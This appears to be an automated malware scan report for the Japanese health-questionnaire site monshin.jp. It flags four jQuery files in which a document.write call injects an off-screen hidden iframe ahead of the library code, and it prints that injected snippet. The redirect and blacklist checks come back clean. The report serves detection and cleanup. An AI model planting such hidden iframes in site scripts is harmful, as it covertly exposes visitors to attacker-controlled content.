Scanned pages/files
Request | Server response | Status |
http://monshin.jp/ | 200 OK Content-Length: 13240 Content-Type: text/html | clean |
http://monshin.jp/js/jquery.js | 200 OK Content-Length: 57422 Content-Type: text/javascript | malicious |
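Malicious code - confirmed by antiviruses (see below). The injected part is the leading document.write(...) call: it writes an iframe inside a div that the accompanying style rule positions far off-screen (left:-1996px; top:-1754px), so the frame is not visible to a visitor. The iframe src is empty in this capture, so the report does not show what the frame was meant to load. The code after that call looks like the file's original jQuery source (the excerpt is cut off). The same document.write prefix is reported for jquery.cookie.js, jquery.fontsizechange.js and jquery.screwdefaultbuttons.js below.
document.write('<style>.ax70piu { position:absolute; left:-1996px; top:-1754px} </style> <div class="ax70piu"><iframe src="" width="135" height="445"></iframe></div>'); (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(ty
Antivirus reports: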
| ||
http://monshin.jp/js/jquery.min.js | 200 OK Content-Length: 155660 Content-Type: text/javascript | clean |
http://monshin.jp/js/jquery.cookie.js | 200 OK Content-Length: 4414 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.ax70piu { position:absolute; left:-1996px; top:-1754px} </style> <div class="ax70piu"><iframe src="" width="135" height="445"></iframe></div>'); jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { options = options || {}; if (value === null) { value = ''; options.expires = -1; } var expires = ''; if (option for (var i = 0; i < cookies.length; i++) { var cookie = jQuery.trim(cookies[i]); if (cookie.substring(0, name.length + 1) == (name + '=')) { cookieValue = decodeURIComponent(cookie.substring(name.length + 1)); break; } } } return cookieValue; } }; Antivirus reports:
| ||
http://monshin.jp/js/jquery.fontsizechange.js | 200 OK Content-Length: 2988 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.ax70piu { position:absolute; left:-1996px; top:-1754px} </style> <div class="ax70piu"><iframe src="" width="135" height="445"></iframe></div>');(function($){ $(function(){ fontsizeChange(); }); function fontsizeChange(){ var changeArea = $(".changeArea"); var btnArea = $("#fontSize"); var changeBtn = btnArea.find(".changeBtn"); var fontSize = [100,116,131]; var ovStr = "_ov"; var active } }, function(){ mouseOut(); }); }); } changeBtn.click(function(){ var index = changeBtn.index(this); var self = $(this); cookieSet(index); sizeChange(); if(useImg){ mouseOut(); } if(!self.hasClass(activeClass)){ changeBtn.not(this).removeClass(activeClass); self.addClass(activeClass); } }); } })(jQuery); Antivirus reports:
| ||
http://monshin.jp/js/tab_change.js | 200 OK Content-Length: 1276 Content-Type: text/javascript | clean |
http://monshin.jp/body/metabolic-syndrome/metabolic-syndrome-check/ | 200 OK Content-Length: 19140 Content-Type: text/html | clean |
http://monshin.jp/js/jquery.screwdefaultbuttons.js | 200 OK Content-Length: 8579 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.ax70piu { position:absolute; left:-1996px; top:-1754px} </style> <div class="ax70piu"><iframe src="" width="135" height="445"></iframe></div>'); (function($) { $.fn.screwDefaultButtons = function(options) { options = $.extend($.fn.screwDefaultButtons.defaults, options); var checkedImage = options.checked; var uncheckedImage = options.unchecked; var disabledImage = options.disabled; var $('.styledRadio').css({'cursor':'pointer', "background-repeat":"no-repeat"}); $('.styledCheckbox').css({'cursor':'pointer', "background-repeat":"no-repeat"}); } $.fn.screwDefaultButtons.defaults = { checked: "url(images/radio_Checked.jpg)", unchecked: "url(images/radio_Unchecked.jpg)", disabled: false, disabledChecked: false, selectAll: null, width: 20, height: 20 }; })(jQuery); Antivirus reports:
| ||
http://monshin.jp/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://monshin.jp/body/insomnia/insomnia-check/ | 200 OK Content-Length: 18494 Content-Type: text/html | clean |
http://monshin.jp/body/diabetes-mellitus/diabetes/ | 200 OK Content-Length: 17656 Content-Type: text/html | clean |
http://monshin.jp/body/diabetes-mellitus/diabetes-mellitus-check/ | 200 OK Content-Length: 18544 Content-Type: text/html | clean |
http://monshin.jp/body/hypertension/high-blood-check/ | 200 OK Content-Length: 16597 Content-Type: text/html | clean |
http://monshin.jp/body/asthma/asthma-check/ | 200 OK Content-Length: 15079 Content-Type: text/html | clean |
http://monshin.jp/body/pollakiuria-and-residualurine/prostatomegaly-check/ | 200 OK Content-Length: 19433 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: monshin.jp
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 01:37:20 GMT
Server: Apache
Content-Type: text/html
Set-Cookie: PHP_SESSION_ID=-1; expires=Wed 28-Jan-2015 01:37:20 GMT; path=/
GET / HTTP/1.1
Host: monshin.jp
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 01:37:20 GMT
Server: Apache
Content-Type: text/html
Set-Cookie: PHP_SESSION_ID=-1; expires=Wed 28-Jan-2015 01:37:20 GMT; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: monshin.jp
Referer: http://www.google.com/search?q=monshin.jp
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: monshin.jp
Referer: http://www.google.com/search?q=monshin.jp
Result:
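The result is similar to the first query. No suspicious redirects were found. Note that this check only compares a direct visit with a visit carrying a search-engine Referer header; it says nothing about the script files flagged in the scan above, which are served with 200 OK regardless of redirects.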
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=monshin.jp
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://monshin.jp/
Result: monshin.jp is not infected or malware details are not published yet.
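Result: monshin.jp is not infected or malware details are not published yet.
Note: neither blacklist lists the site, while the file scan above marks four scripts under /js/ as malicious. A missing blacklist entry does not clear those files; they should be compared against known-good copies of the same libraries and restored from a trusted source.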